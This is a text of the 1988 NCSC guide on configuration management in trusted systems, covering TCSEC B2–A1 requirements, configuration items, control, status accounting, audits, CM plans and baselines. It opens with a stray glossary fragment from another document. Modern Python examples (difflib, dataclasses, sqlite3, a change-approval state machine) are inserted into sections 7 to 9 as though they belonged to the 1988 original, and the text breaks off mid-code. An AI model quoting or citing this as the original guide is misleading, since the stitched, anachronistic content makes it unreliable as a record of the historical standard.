Security Relevant Portion (SRP) - The protection-critical mechanism of the subsystem, the subsystem's interface(s) to the protected system, and interfaces to the mechanisms providing required supporting functions. For most cases, the SRP encompasses the entire subsystem. 
Subsystem - See "computer security subsystem." 
System - The combination of the protected system and the computer security subsystem. 
*U.S. GOVERNMENT PRINTING OFFICE: 1989-225-703

National Computer Security Center: A Guide to Understanding Configuration Management in Trusted Systems

 

                        NATIONAL COMPUTER

                         SECURITY CENTER

                           A GUIDE TO

                          UNDERSTANDING

                     CONFIGURATION MANAGEMENT

                        IN TRUSTED SYSTEMS

                                            NCSC-TG-006-88
                                     Library No. S-228,590

                           FOREWORD

This publication, "A Guide to Understanding Configuration
Management in Trusted Systems", is being issued by the National
Computer Security Center (NCSC) under the authority of and in
accordance with Department of Defense (DoD) Directive 5215.1. The
guidelines described in this document provide a set of good
practices related to configuration management in Automated Data
Processing (ADP) systems employed for processing classified and
other sensitive information.  Recommendations for revision to
this guideline are encouraged and will be reviewed biannually by
the National Computer Security Center through a formal review
process.  Address all proposals for revision through appropriate
channels to:

       National Computer Security Center
       9800 Savage Road
       Fort George G. Meade, MD  20755-6000

       Attention: Chief, Computer Security Technical Guidelines

____________________________
Patrick R. Gallagher, Jr.                        28 March 1988
Director
National Computer Security Center

                                i

                        ACKNOWLEDGEMENTS

Special recognition is extended to James N. Menendez, National
Computer Security Center (NCSC), as project manager and primary
author of this document.

Special acknowledgement is given to Grant Wagner, NCSC, and Dana
Nell Stigdon, NCSC, for their constant help and guidance in the
production of this document.  Additionally, Dana Nell Stigdon,
was responsible for writing the section on the Ratings
Maintenance Program.  Acknowledgement is also given to all those
members of the computer security community who contributed their
time and expertise by actively participating in the review of
this document.

                                ii

                            CONTENTS

FOREWORD ....................................................  i

ACKNOWLEDGEMENTS ............................................ ii

CONTENTS .................................................... iii

PREFACE .....................................................  v

1.  PURPOSE .................................................  1

2.  SCOPE ...................................................  1

3.  CONTROL OBJECTIVES ......................................  2

4.  ORGANIZATION ............................................  3

5.  OVERVIEW OF CONFIGURATION MANAGEMENT PRINCIPLES .........  4

    5.1  PURPOSE OF CONFIGURATION MANAGEMENT ................  4

6.  MEETING THE CRITERIA REQUIREMENTS .......................  5

    6.1  THE B2 CONFIGURATION MANAGEMENT REQUIREMENTS .......  5
    6.2  THE B3 CONFIGURATION MANAGEMENT REQUIREMENTS .......  6
    6.3  THE A1 CONFIGURATION MANAGEMENT REQUIREMENTS .......  6

7.  FUNCTIONS OF CONFIGURATION MANAGEMENT ...................  7 

    7.1  CONFIGURATION IDENTIFICATION .......................  7
         7.1.1  Configuration Items .........................  8

    7.2  CONFIGURATION CONTROL ..............................  10
    7.3  CONFIGURATION STATUS ACCOUNTING ....................  11 
    7.4  CONFIGURATION AUDIT ................................  12

8.  THE CONFIGURATION MANAGEMENT PLAN .......................  14

9.  IMPLEMENTATION METHODS ..................................  16

    9.1  THE BASELINE CONCEPT ...............................  16
    9.2  CONFIGURATION MANAGEMENT AT MER, INC. ..............  18
    9.3  THE CONFIGURATION CONTROL BOARD ....................  20

10. OTHER TOPICS ............................................  23

   10.1  TRUSTED DISTRIBUTION ...............................  23 
   10.2  FUNCTIONAL TESTING .................................  24 
   10.3  CONFIGURATION MANAGEMENT TRAINING ..................  24

                               iii

   10.4  CONFIGURATION MANAGEMENT SUPERVISION ...............  25

11. RATINGS MAINTENANCE PROGRAM .............................  26

12. CONFIGURATION MANAGEMENT SUMMARY  .......................  27

APPENDIX A: AUTOMATED TOOLS .................................  29

    A.1  UNIX (1) SCCS ......................................  29
    A.2  VAX DEC/CMS ........................................  30

GLOSSARY ....................................................  32

REFERENCES ..................................................  34

(1)  Unix is a registered trademark of Bell Laboratories

                                iv

                            PREFACE

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation
Criteria (TCSEC) as requirements.  Any recommendations that are
not in the TCSEC will be prefaced by the word "should," whereas
all requirements will be prefaced by the word "shall."  It should
be noted that a TCSEC rating will only be based upon meeting the
TCSEC requirements.  Recommendations are made in order to provide
additional ways of increasing assurance.  It is hoped that this
will help to avoid any confusion.

                                v

1.  PURPOSE

The Trusted Computer System Evaluation Criteria (TCSEC) is the
standard used for evaluating the effectiveness of security
controls built into ADP systems.  The TCSEC is divided into four
divisions: D, C, B, and A, ordered in a hierarchical manner with
the highest division, A, being reserved for systems providing the
best available level of assurance.  Within divisions C through A
are a number of subdivisions known as classes, which are also
ordered in a hierarchical manner to represent different levels of
security in these classes.

For TCSEC classes B2 through A1, the TCSEC requires that all
changes to the Trusted Computing Base (TCB) be controlled by
configuration management.  Configuration management of a trusted
system consists of identifying, controlling, accounting for, and
auditing all changes made to the TCB during its design,
development, and maintenance.  The primary purpose of this guideline
is to provide guidance to developers of trusted systems on what
configuration management is and how it may be implemented in the
development and life-cycle of a trusted system.  This guideline
has also been designed to provide guidance to developers of all
systems on the importance of configuration management and how it
may be implemented.

Examples in this document are not to be construed as the only
implementation that will satisfy the TCSEC requirement.  The
examples are merely suggestions of appropriate implementations. 
The recommendations in this document are also not to be construed
as supplementary requirements to the TCSEC.  The TCSEC is the
only metric against which systems are to be evaluated.

This guideline is part of an on-going program to provide helpful
guidance on TCSEC issues and the features they address.  

2.  SCOPE

An important security feature of TCSEC classes B2 through A1 is
that there be configuration management procedures to manage
changes to the Trusted Computing Base (TCB) and all of the
documentation and tests affected by these changes.  Additionally,
it is recommended that such plans and procedures exist for
systems not being considered for an evaluation or whose target
evaluation class may be less than B2.  The assurance provided by
configuration management is beneficial to all systems.  This
guideline will discuss configuration management and its features
as they apply to computer systems and products, with specific
attention being given to those that are being built with the 

                                1

intention of meeting the requirements of the TCSEC, and to those
systems planning to be re-evaluated under the Ratings Maintenance
Program (RAMP) (see Section 11. RAMP).

Except in cases where there is a distinction between the
configuration management of a trusted system and an untrusted
system, the word "system" shall be used as the object of
configuration management, encompassing both the system and the
TCB.  It should be noted that the TCSEC only requires the TCB to
be controlled by configuration management, although it is
recommended that the entire system be maintained under
configuration management.

3.  CONTROL OBJECTIVES

The TCSEC gives the following as the Assurance Control Objective:

    "Systems that are used to process or handle classified or    
    other sensitive information must be designed to guarantee    
    correct and accurate interpretation of the security policy   
    and must not distort the intent of that policy.  Assurance   
    must be provided that correct implementation and operation   
    of the policy exists throughout the system's life-cycle."[1]

Configuration management maintains control of a system throughout
its life-cycle, ensuring that the system in operation is the
correct system, implementing the correct security policy.  The
Assurance Control Objective as it relates to configuration
management leads to the following control objective that may be
applied to configuration management: 

    "Computer systems that process and store sensitive or        
    classified information depend on the hardware and software   
    to protect that information.  It follows that the hardware   
    and software themselves must be protected against            
    unauthorized changes that could cause protection mechanisms  
    to malfunction or be bypassed completely.  [For this         
    reason, changes to trusted computer systems, during their    
    entire life-cycle, must be carefully considered and          
    controlled to ensure that the integrity of the               
    protection mechanism is maintained.]  Only in this way can   
    confidence be provided that the hardware and software        
    interpretation of the security policy is maintained          
    accurately and without distortion."[1]

                                2

4.  ORGANIZATION

This document has been written to provide the reader with an 
understanding of what configuration management is and how it may
be implemented in an ADP system.

For developers of trusted systems, this document also relates the
TCSEC requirements to the configuration management practices that
meet them.  This document has been organized to illustrate the
connection between practices and requirements through the use of
a numbering convention for the TCSEC requirements.  The
configuration management requirements have been broken down into
19 separate requirements in Section 6 of this document.  The
requirement number(s) will be located in parentheses following
the appropriate discussion; e.g., (Requirements 2, 15) signifies
that the preceding discussion dealt with TCSEC requirements 2 and
15 as stated in Section 6. 

                                3

5.  OVERVIEW OF CONFIGURATION MANAGEMENT PRINCIPLES

Configuration management consists of four separate tasks:
identification, control, status accounting, and auditing.  For
every change that is made to an automated data processing (ADP)
system, the design and requirements of the changed version of the
system should be identified.  The control task of configuration
management is performed by subjecting every change to
documentation, hardware, and software/firmware to review and
approval by an authorized authority.  Configuration status
accounting is responsible for recording and reporting on the
configuration of the product throughout the change.  Finally,
through the process of a configuration audit, the completed
change can be verified to be functionally correct, and for
trusted systems, consistent with the security policy of the
system.  Configuration management is a sound engineering practice
that provides assurance that the system in operation is the
system that is supposed to be in use.  The assurance control
objective as it relates to configuration management of trusted
systems is to "guarantee that the trusted portion of the system
works only as intended."[1]

Procedures should be established and documented by a
configuration management plan to ensure that configuration
management is performed in a specified manner.  Any deviation
from the configuration management plan could contribute to the
failure of the configuration management of a system entirely, as
well as the trust placed in a trusted system. 

5.1  Purpose of Configuration Management

Configuration management exists because changes to an existing
ADP system are inevitable.  The purpose of configuration
management is to ensure that these changes take place in an
identifiable and controlled environment and that they do not
adversely affect any properties of the system, or in the case of
trusted systems, do not adversely affect the implementation of
the security policy of the TCB.   Configuration management
provides assurance that additions, deletions, or changes made to
the TCB do not compromise the trust of the originally evaluated
system.  It accomplishes this by providing procedures to ensure
that the TCB and all documentation are updated properly.  

                                4

6.  MEETING THE CRITERIA REQUIREMENTS

This section lists the TCSEC requirements for configuration
management.  Each requirement for each class has been listed
separately and numbered.  Each number may be referenced to the
requirement discussions that follow in this document.  This
section is designed to serve as a quick reference for TCSEC class
requirements.

6.1  The B2 Configuration Management Requirements

Requirement 1 - "During development and maintenance of the TCB, a
configuration management system shall be in place."[1]

Requirement 2 - The configuration management system shall
maintain "control of changes to the descriptive top-level
specification (DTLS)."[1]

Requirement 3 - The configuration management system shall
maintain control of changes to "other design data."[1]

Requirement 4 - The configuration management system shall
maintain control of changes to "implementation documentation"[1]
(e.g., user's manuals, operating procedures).

Requirement 5 - The configuration management system shall
maintain control of changes to the "source code."[1]

Requirement 6 - The configuration management system shall
maintain control of changes to "the running version of the object
code."[1]

Requirement 7 - The configuration management system shall
maintain control of changes to "test fixtures."[1]

Requirement 8 - The configuration management system shall
maintain control of changes to test "documentation."[1]

Requirement 9 - "The configuration management system shall assure
a consistent mapping among all documentation and code associated
with the current version of the TCB."[1]

Requirement 10 - The configuration management system shall
provide tools "for generation of a new version of the TCB from
the source code."[1]

Requirement 11 - The configuration management system shall
provide "tools for comparisons of a newly generated TCB version 

                                5

with the previous version in order to ascertain that only the 
intended changes have been made in the code that will actually be
used as the new version of the TCB."[1]                          

6.2  The B3 Configuration Management Requirements

The requirements for configuration management at TCSEC class B3
are the same as the requirements for TCSEC class B2. Although no
additional requirements have been added, the configuration
management system shall change to reflect changes in the design
documentation requirements at class B3.  This means that the
additional documentation required for TCSEC class B3 shall also
be maintained under configuration management.

6.3  The A1 Configuration Management Requirements

Requirements 2 through 11 are the same as those described in
Section 6.1 for a class B2 rating.  In addition, the following
requirements are added for class A1:

Requirement 12 - "During the entire life-cycle, i.e., during the
design, development, and maintenance of the TCB, a configuration
management system shall be in place for all security-relevant
hardware, firmware, and software."[1]

Requirement 13 - The configuration management system shall
maintain control of changes to the TCB hardware.

Requirement 14 - The configuration management system shall
maintain control of changes to the TCB software.

Requirement 15 - The configuration management system shall
maintain control of changes to the TCB firmware.

Requirement 16 - The configuration management system shall
"maintain control of changes to the formal model."[1]

Requirement 17 - The configuration management system shall
maintain control of changes to the "formal top-level
specifications."[1]

Requirement 18 - The tools available for configuration management
shall be "maintained under strict configuration control."[1]

Requirement 19 - "A combination of technical, physical, and
procedural safeguards shall be used to protect from unauthorized
modification or destruction the master copy or copies of all
material used to generate the TCB."[1]

                                6

7.  FUNCTIONS OF CONFIGURATION MANAGEMENT

7.1  Configuration Identification

Configuration management procedures should enable a person to
"identify the configuration of a system at discrete points in
time for the purpose of systematically controlling changes to the
configuration and maintaining the integrity and traceability 
of this configuration throughout the system life cycle."[4]  The 
basic function of configuration identification is to identify the
components of the design and implementation of a system.  When it
concerns trusted systems, this specifically means the design and
implementation of the TCB.  This task may be accomplished through
the use of identifiers and baselines (see Section 9.1  The
Baseline Concept).  By establishing configuration items and
baselines, the configuration of the system and its TCB can be
accurately identified throughout the system life-cycle.  

At TCSEC class B2, the TCSEC requires that "changes to the
descriptive top-level specification, other design data,
implementation documentation, source code, the running version of
the object code, and test fixtures and documentation"[1] of the
TCB be controlled by configuration management (Requirements 2, 3,
4, 5, 6, 7, 8).  Configuration identification helps achieve this
control.  The TCSEC requires that each change to the TCB shall be
individually identifiable so that a history of the TCB may be
generated at any time.  At TCSEC class A1, the requirements are
extended to include that the "formal model...and formal top-level
specifications" of the TCB shall also be maintained under the
configuration management system (Requirements 16, 17).  

The following is a sample list of what shall be identified and
maintained under configuration management:

   * the baseline TCB including hardware, software, and firmware

   * any changes to the TCB hardware, software, and firmware     
     since the previous baseline

   * design and user documentation

   * software tests including functional and system integrity    
     tests

   * tools used for generating current configuration items       
     (required at TCSEC class A1 only)

Configuration management procedures should make it possible to
accurately reproduce any past TCB configuration.  In the event a 

                                7

security vulnerability is discovered in a version of the TCB
other than the most current one, analysts will need to be able to
reconstruct the past environment.  This reconstruction will be
possible to perform if proper configuration identification has
been performed throughout the system life-cycle.  

The TCSEC also requires at class B2 and above, that tools shall
be provided "for generation of a new version of the TCB from the
source code" and that there "shall be tools for comparing a newly
generated version with the previous TCB version in order to
ascertain that only the intended changes have been made in the
code that will actually be used as the new version of the TCB"[1]
(Requirements 10, 11).  These tools are responsible for providing
assurance that no additional changes have been inserted into the
TCB that were not intended by the system designer.  Automated
tools are available that make it possible to identify changes to
a system online (see APPENDIX A: AUTOMATED TOOLS).  Any changes,
or suggested changes to a system should be entered into an online
library.  This data can later be used to compare any two versions
of a system.  Such online configuration libraries may even
provide the capability for line-by-line comparison of software
modules and documentation.  At Class A1, the tools used to
perform this function shall be "maintained under strict
configuration control"[1] (Requirement 18).  These tools shall
not be changed without having to undergo a strict review process
by an authorized authority.
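
The comparison such tools perform can be sketched briefly.  The
following is an illustrative example only (the file names and the
change shown are hypothetical, and the TCSEC does not prescribe
any particular tool); it uses Python's standard difflib module to
report, line by line, exactly what differs between two versions of
a source module, so a reviewer can confirm that only the intended
changes are present.

```python
import difflib

def compare_versions(old_lines, new_lines, old_name, new_name):
    """List every line-by-line difference between two module versions."""
    return list(difflib.unified_diff(old_lines, new_lines,
                                     fromfile=old_name, tofile=new_name,
                                     lineterm=""))

# Hypothetical TCB module, before and after an approved change.
old = ["check_password(user);", "grant_access(user);"]
new = ["check_password(user);", "audit_log(user);", "grant_access(user);"]

for line in compare_versions(old, new, "tcb_v1/login.c", "tcb_v2/login.c"):
    print(line)   # lines prefixed "+" or "-" are the changes to review
```

A reviewer checking this output against the approved change request
gains assurance that no unintended modifications have been inserted
into the new version of the TCB.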

7.1.1  Configuration Items

A configuration item is a uniquely identifiable subset of the
system configuration that represents the smallest portion of the
system to be subject to independent configuration management
change control procedures.   Configuration items need to be
individually controlled because any change to a configuration
item may have some effect upon the properties of the system or
the security policy of the TCB.  

Configuration items as they relate to the TCB, are subsets of the
TCB's hardware, firmware, software, documentation, tests, and at
class A1, development tools.  Each module of TCB software for
example, may constitute a separate configuration item. 
Configuration items should be assigned unique identifiers (e.g.,
serial numbers, names) to make them easier to identify throughout
the system life-cycle.  Proper identification plays a vital role
in meeting the TCSEC requirement for class B2 that requires the
configuration management system to "assure a consistent mapping
among all documentation and code associated with the current
version of the TCB"[1] (Requirement 9).  Used in conjunction with

                                8

a configuration audit, a consistent labeling system helps tie
documentation to the code it describes.  Not only does labeling
each configuration item make them easier to identify, but it also
increases the level of control that may be maintained over the
entire system by making these items more traceable.    

Configuration items may be given an identifier through a random
distribution process, but it is more useful for the
configuration identifier to describe the item it identifies. 
Selecting different fields of the configuration identifier to
represent characteristics of the configuration item is one method
of accomplishing this.  The United States Social Security number
is a "configuration identifier" we all have that uses such a
system.  The different fields of the number identify where we
applied for the Social Security card, hence describing a little
bit about ourselves.   As the configuration identifier relates to
computer systems, one field should identify the system version
the item belongs to, the version of software that it is, or its
interface with other configuration items.   When using a
numbering scheme like this, a change to a configuration item
should result in the production of a new configuration
identifier.  This new identifier should be produced by an
alteration or addition to the existing configuration identifier. 
A new version of a software program should not be identified by
the same configuration item number as the original program.  By
treating the two versions as distinct configuration items, line-
by-line comparisons between them can be performed.  
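
One way to realize such a field-structured numbering scheme is
sketched below.  The field layout and names are invented for
illustration; a vendor would define its own scheme in the
configuration management plan.  Each approved change yields a new
identifier derived from the old one, so the two versions remain
distinct configuration items.

```python
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class ConfigID:
    """Field-structured configuration identifier (fields illustrative)."""
    system_version: str   # system release the item belongs to
    item_type: str        # e.g., "SW" software, "HW" hardware, "DOC" document
    item_number: int      # unique number within the type
    revision: int         # bumped on every approved change

    def __str__(self):
        return (f"{self.system_version}-{self.item_type}-"
                f"{self.item_number:04d}.r{self.revision}")

def revise(cid: ConfigID) -> ConfigID:
    """An approved change produces a new identifier; it never reuses the old."""
    return replace(cid, revision=cid.revision + 1)

original = ConfigID("V2", "SW", 17, 0)   # prints as V2-SW-0017.r0
changed = revise(original)               # prints as V2-SW-0017.r1
```

Because the two identifiers differ only in the revision field, the
change history of the item remains traceable from the identifier
alone.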

Identifying configuration items is a task that should be
performed early in the development of the system, and once
something is designated as a configuration item, the design 
of that item should not change without the knowledge and 
permission of the party controlling the item.  Early
identification of configuration items increases the level of
control that may be maintained over the item and allows the item
to be traced back through all stages of the system development. 
In the event that a configuration item is not identified until
late in the development process, accountability for that item in
the early stages of the system development would be non-existent.

Configuration items may vary widely in complexity, size, and
type, and it is important to choose configuration items with 
appropriate granularity.  If the items are too large, individual
changes within an item escape separate control and review.  If
the items are too small, the amount of total identification data
will overwhelm the system auditors.[2]  The
appropriate granularity for configuration items should be
identified by each vendor and documented in the configuration
management plan.

                                9

7.2  Configuration Control

"Configuration control involves the systematic evaluation,
coordination, approval, or disapproval of proposed changes to the
design and construction of a configuration item whose
configuration has been formally approved."[5]  Configuration
control should begin in the earliest stages of the design and 
development of the system and extend over the full life of the
configuration items included in the design and development
stages.  Early initiation of configuration control procedures
provides increased accountability for the system by making its
development more traceable.  The traceability function of
configuration control serves a dual purpose.  It makes it
possible to evaluate the impact of a change to the system and
controls the change as it is being made.  With configuration
control in place, there is less chance of making undesirable
changes to a system that may later adversely affect the security
of the system.

Initial phases of configuration control are directed towards
control of the system configuration as defined primarily in
design documents.  For these, the Configuration Management plan
shall specify procedures to ensure that all documentation is
updated properly and presents an accurate description of the
system and TCB configuration.  Often a change to one area of a
system may necessitate a change to another area.   It is not
acceptable to only write documentation for new code or newly
modified code, but rather documentation for all parts of the TCB
that were affected by the addition or change shall be updated
accordingly.  Although documentation may be available, unless it
is kept under configuration management and updated properly it
will be of little, if any use.  In the event that the system is
found to be deficient in documentation, efforts should be made to
create new documentation for areas of the system where it is
presently inadequate or non-existent.                            

To meet the TCSEC requirements, though, configuration control
shall cover a broader area than just documentation, and at Class
B2 shall also maintain control of "design data, source code, the
running version of the object code, and test fixtures"[1] of the
TCB (Requirements 3, 5, 6, 7).  A change to any of these shall be
subject to review and approval by an authorized authority.  

For TCB configuration items, those items shall not be able to
change without the permission of the controlling party.   At
TCSEC class A1, this requirement is strengthened to require
"procedural safeguards"[1] to protect against unauthorized
modification of the materials used in the TCB (Requirement 19). 
These procedures should require that not only does the 

                                10

controlling party need to give permission to have a change
performed, but that the controlling party performs the change on
the master copy of the TCB that will be released.  This ensures
against changes being made to the master copy that are different
than the approved changes. 

The degree of configuration control that is exercised over the
TCB will affect whether or not it meets the TCSEC requirements
for configuration management.  The configuration management
requirements in the TCSEC require that a configuration management
system be in place during the "development and maintenance of the
TCB" at Class B2 (Requirement 1), and at Class A1, "during the
entire life-cycle"[1] of the TCB (Requirement 12).  A minimal
configuration control system that would not be sufficient in
meeting the TCSEC requirements, may only provide for review after
a change has been made to the system.  A system such as this may 
ensure that the change is complete and acceptable and may control
the release of the change, but for the most part, the control 
exercised is little more than an after-the-fact quality assurance
check. This system is certainly better than having no control 
system in place, but it would not meet the TCSEC requirements for
configuration management.  What is missing from this system that 
would bring it closer to the B2 requirements is control over the 
change as it is being made.  The configuration control required
by the TCSEC should provide for constant checking and approval of
a change from its inception, through implementation and testing,
to release.  The level of control exercised over the TCB may
exceed that of the rest of the system, but it is recommended that
all parts of the system be under configuration control.  

In the case of a change to hardware or software/firmware that
will be used at multiple sites, configuration control is also 
responsible for ensuring that each site receives the appropriate
version of the system. 

The point behind configuration control of the TCB is that all
changes to the TCB shall be approved, monitored, and evaluated to
provide assurance that the TCB functions properly and that all
security policies are maintained.
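
The approval discipline described above, control of a change from
its inception through implementation and testing to release, can be
sketched as a simple state machine.  The stage names below are
illustrative, not drawn from the TCSEC.

```python
# Authorized transitions in a change-control workflow (illustrative).
TRANSITIONS = {
    "proposed":    {"approved", "rejected"},
    "approved":    {"implemented"},
    "implemented": {"tested"},
    "tested":      {"released"},
}

def advance(state, new_state):
    """Move a change to new_state only if the transition is authorized."""
    if new_state not in TRANSITIONS.get(state, set()):
        raise ValueError(f"change cannot go from {state!r} to {new_state!r}")
    return new_state

state = "proposed"
state = advance(state, "approved")     # review and approval by an authority
state = advance(state, "implemented")  # controlling party performs the change
state = advance(state, "tested")       # testing confirms the change
state = advance(state, "released")     # only now may the change be released
```

Because advance() refuses unauthorized transitions, a change cannot
reach release without passing through approval, implementation, and
testing in order, which is the constant checking the TCSEC intends.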

7.3  Configuration Status Accounting

Configuration status accounting is charged with reporting on the
progress of the development in very specific ways.  It
accomplishes this task through the processes of data recording,
data storing, and data reporting.  The main objective of
configuration status accounting is to record and report all
information that is of significance to the configuration
management process.  What is of significance should be outlined
in the Configuration Management Plan.  The establishment of a new
baseline (see Section 9.1 THE BASELINE CONCEPT) or the meeting of
a milestone is an example of what should be recorded as
configuration status accounting information.  The requirements in
the configuration management plan should be viewed as the minimum,
and any events that seem relevant to configuration management
should be captured and recorded, since they may prove to be
useful in the future.

The configuration accounting system may consist of tracing
through documentation manually to find the status of a change or
it may consist of a database that can automatically track a
change.  As long as the information exists accurately in some
form, it will serve its purpose.  The benefit of an online
status accounting system is that the information may be kept in a
more structured fashion, which would facilitate keeping it up to 
date.  Being able to query a database for information concerning
the status of a configuration change or configuration item would 
also be less cumbersome than sorting through notebook pages.
Finally, the durability of a diskette or hard disk for storage 
outweighs that of a spiral notebook or folder, provided that it
is properly backed up to avoid data loss in the event of a system
failure.  
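The kind of online status accounting data base described above can be
sketched briefly.  The following is an illustrative sketch only; the
table layout, column names, and change identifiers are assumptions
invented for the example, not part of any requirement.

```python
import sqlite3

# Minimal sketch of an online status accounting store.  The table
# layout and identifiers are illustrative assumptions.
con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE change_status (
                   change_id   TEXT PRIMARY KEY,
                   config_item TEXT NOT NULL,
                   reason      TEXT,
                   status      TEXT NOT NULL)""")

def record_change(change_id, config_item, reason, status="proposed"):
    """Record a newly authorized change and its reason."""
    con.execute("INSERT INTO change_status VALUES (?, ?, ?, ?)",
                (change_id, config_item, reason, status))

def update_status(change_id, status):
    """Advance the recorded status of a change as work progresses."""
    con.execute("UPDATE change_status SET status = ? WHERE change_id = ?",
                (status, change_id))

def query_status(change_id):
    """Query the data base for the current status of a change."""
    return con.execute("SELECT config_item, status FROM change_status "
                       "WHERE change_id = ?", (change_id,)).fetchone()

record_change("CR-001", "TCB-SW-017", "correct audit record format")
update_status("CR-001", "under test")
print(query_status("CR-001"))  # ('TCB-SW-017', 'under test')
```

Querying such a store takes the place of the manual trace through
notebook pages described above.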

Whichever system is used, it should be possible to quickly locate
all authorized versions of a configuration item, add together all
authorized changes with comments about the reason for the change,
and arrive at either the current status of that configuration
item, or some intermediate status of the requested item.  The
status of all authorized changes being performed should be
formulated into a System Status Report that will be presented at
a Configuration Control Board meeting (see Section 9.3 THE
CONFIGURATION CONTROL BOARD).  

Configuration status accounting "establishes records and reports
which enable proper logistics support, i.e., the supplying of
spares, instruction manuals, training and maintenance facilities,
etc. to be established."[5]  The records and reports produced 
through configuration status accounting should include a current 
configuration list, an historical change list, the original
designs, the status of change requests and their implementation,
and should provide the ability to trace all changes.

7.4  Configuration Audit

Configuration auditing involves checking for top to bottom
completeness of the configuration accounting information "to
ascertain that only the [authorized] changes have been made in
the code that will actually be used as the new version of the
TCB."[1] (Requirement 11)  When a change has been made to a
system, it should be reviewed and audited for its effect on the
rest of the system. This should include reviewing and testing all
software to ensure that the change has been performed correctly. 

Configuration auditing is concerned with examining the control
process of the system and ensuring that it actually occurs the
way it should.  Configuration auditing for trusted systems
verifies that after a change has been made to the TCB, the
security features and assurances are maintained. Configuration
audits should be performed periodically to verify the
configuration status accounting information.  The configuration
audit minimizes the likelihood that unapproved changes have been
inserted unnoticed and verifies that the status accounting
information adequately demonstrates that the configuration
management assurance is valid.

"A complete audit should include tracing each requirement down 
through all functions that implement it to see if that 
requirement is met."[2]  Furthermore, the configuration audit
should also ensure that no additions were made that were not
required.  For the audit to provide a useful form of technical
review, it should be predictable and as foolproof as possible,
i.e., there should be specific desired results. 

The configuration audit should verify that:

* the architectural design satisfies the requirements

* the detailed design satisfies the architectural design

* the code implements the detailed design

* the item/product performs per the requirements

* the configuration documentation and the item/product match

The main emphasis of configuration auditing is on providing the 
user with reasonable assurance that the version of a system in 
use is the same version that the user expects to be in use. 
Configuration audits ensure that the configuration control
procedures of the configuration management system are being
followed.  The assurance feature of configuration auditing is
provided through reasonable and consistent accountability
procedures.  All code audits should follow roughly the same
procedures and perform the same set of checks for every change to
the system.     


8.  THE CONFIGURATION MANAGEMENT PLAN

Effective configuration management should include a well-thought-
out plan that should be prepared immediately after project
initiation.  This plan should describe, in simple, positive
statements, what is to be done to implement configuration
management in the system and TCB.  A minimal configuration
management plan may be limited to simply defining how
configuration management will be implemented as it relates to the
identification, control, accounting, and auditing tasks.  The
configuration management plan described in the following
paragraphs is an example of a plan that goes into more detail and
contains documentation on all aspects of configuration
management, such as examples of documents to be used for
configuration management, procedures for any automated tools
available, or a Configuration Control Board roster (see Section
9.3 THE CONFIGURATION CONTROL BOARD).  The configuration
management plan should contain documentation that describes how
the configuration management "tasks are to be carried out in
sufficient detail that anyone involved with the project can
consult them to determine how each specific development task
relates to CM."[2]    

One portion of the configuration management plan should define
the roles played by designers, developers, management, the
Configuration Control Board, and all of the personnel involved
with any part of the life-cycle of the system.  The
responsibilities required by all those involved with the system
should be established and documented in the configuration
management plan to ensure that the human element functions
properly during configuration management.  A list of
Configuration Control Board members, or the titles of the members
should also be included in this section.

Any tools that will be available and used for configuration
management should be documented in the configuration management 
plan.  At TCSEC class A1, it is required that these tools shall
be "maintained under strict configuration control"[1]
(Requirement 18).  These tools may include forms used for change
control, conventions for labeling configuration items, software
libraries, as well as any automated tools that may be available
to support the configuration management process.  Samples of any
documents to be used for reporting should also be contained in
the configuration management plan with a description of each.

A section of the Configuration Management Plan should deal with
procedures.  Since the main thrust of configuration management
consists of the following of procedures, there needs to be
thorough documentation on what procedures one should follow
during configuration management.  The configuration management
plan should provide the procedures to take to ensure that both
user and design documentation are updated in synchrony with all
changes to the system.  It should include the guidelines for
creating and maintaining functional tests and documentation
throughout the life of the system.  The configuration management
plan should describe the procedures for how the design and
implementation of changes are proposed, evaluated, coordinated,
and approved or disapproved.  The configuration management plan
should also include the steps to take to ensure that only those
approved changes are actually included and that the changes are
included in all of the necessary areas.

Another portion of the configuration management plan should
define any existing "emergency" procedures, e.g., procedures for
performing a time sensitive change without going through a full
review process, that may override the standard procedure.  These
procedures should define the steps for retroactively implementing
configuration management after the emergency change has been
completed. 

The configuration management plan is a living document and should
remain flexible during design and development phases.  Although
the configuration management plan is in place to impose control
on a project, it should still be open to additions and changes as
designers and developers see fit.   This is not to say that the
configuration management plan is only a guide and need not be
followed, but that modifications should be able to occur.  If the
plan is not followed, there is no way it will be able to provide
the appropriate assurances.  In the event that a change is needed
to the configuration management plan, the change should be
carefully evaluated and approved.  In changes to the
configuration management plan of a trusted system this evaluation
shall ensure that the security features and assurances supported
by the plan are still maintained after the change has been
implemented.   


9.  IMPLEMENTATION METHODS

This section discusses implementation methods for configuration
management that may be used to meet some of the requirements of
the TCSEC.  Section 9.1 discusses the baseline concept as a
method of configuration identification.  The baseline concept
utilizes the features of configuration management spoken of
previously, but divides the life-cycle of the system into
different baselines.

Section 9.2 illustrates how a fictitious company, MER, Inc.,
conducts configuration management.  They are attempting to meet
the TCSEC requirements for a B2 system.   

Section 9.3 discusses the concept of a Configuration Control
Board (CCB) for carrying out configuration control.  A CCB is a
body of people responsible for configuration control.  This 
concept is widely used by many computer vendors.

9.1  The Baseline Concept

Baselines are established at pre-selected design points in the
system life-cycle.  One baseline may be used to describe a
specific version of a system, or in some configuration management
systems a single baseline may be defined at each of several major
milestones.   Baselines should be established at the discretion
of the Configuration Control Board and outlined in the
configuration management plan.  In cases where several baselines
are established, each baseline serves as a cutoff point for one
segment of development, while simultaneously acting as the step
off point for another segment.   The characteristics common to
all baselines are that the design of the system will be approved
at the point of their establishment and it is believed that any
changes to this design will have some impact on the future
development of the system. 

Baseline management is one technique for performing configuration
identification.  It identifies the system and TCB design and
development as a series of phases or baselines that are subject
to configuration control.  Used in conjunction with configuration
items, this is another effective way to identify the system and
its TCB configuration throughout its life-cycle.       

"For each different type of baseline, the individual components
to be controlled should be identified, and any changes that
update the current configuration should be approved and 
documented.  For each intermediate product in the development 
[life-cycle] there is only one baseline.  The current
configuration can be found by applying all approved changes to
the baseline."[2]
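The rule just quoted, that the current configuration is the baseline
plus all approved changes, can be illustrated with a short sketch;
the item names and record layout are assumptions for the example.

```python
# Illustrative sketch: derive the current configuration by applying
# only the approved changes, in order, to the baseline.
baseline = {"login.c": "v1", "audit.c": "v1", "kernel.c": "v1"}

changes = [
    {"item": "login.c",  "new_version": "v2", "approved": True},
    {"item": "kernel.c", "new_version": "v2", "approved": False},  # rejected
    {"item": "login.c",  "new_version": "v3", "approved": True},
]

def current_configuration(baseline, changes):
    config = dict(baseline)            # the baseline itself is never altered
    for change in changes:
        if change["approved"]:         # only approved changes are applied
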